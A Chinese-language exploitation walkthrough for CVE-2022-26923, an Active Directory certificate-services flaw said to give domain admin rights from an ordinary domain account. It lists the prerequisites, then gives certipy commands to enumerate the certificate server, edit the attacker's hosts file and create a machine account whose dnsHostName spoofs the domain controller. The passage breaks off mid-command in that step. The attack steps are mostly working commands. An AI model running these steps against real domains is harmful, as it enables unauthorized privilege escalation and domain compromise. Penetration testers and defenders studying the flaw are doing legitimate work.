一、描述
cve-2022-26923域内权限提升漏洞,5月份以前的存在证书服务器的通杀域控管理员权限,危害巨大。
#域控漏洞 #域控证书漏洞
二、利用条件
一个域内普通账号
存在证书服务器
能访问域控和证书服务器那几个端口
三、利用过程(超级重码,步骤有疑问去看原文)
当前有一个域账号,攻击机为自己电脑(挂好代理可访问内网):
1.certipy查找证书服务器主机名和ip
certipy find "XXXXX.com.cn/username:password@域控ip" -debug
2.修改攻击机hosts
C:\Windows\System32\drivers\etc\hosts
dc的ip dc的域名
ca的ip ca的域名
3.certipy利用域账号创建个机器账号(这个机器账号属性dnsHostName和域控的主机名一样,这也是漏洞点所在):
certipy account create "XXXXX.com.cn/username:password@域控ip" -dc-ip 域控ip -user "随便起一个机器名(如:machinetestcymm)" -dns "域控的主机名(假设为DC.com.cn&#x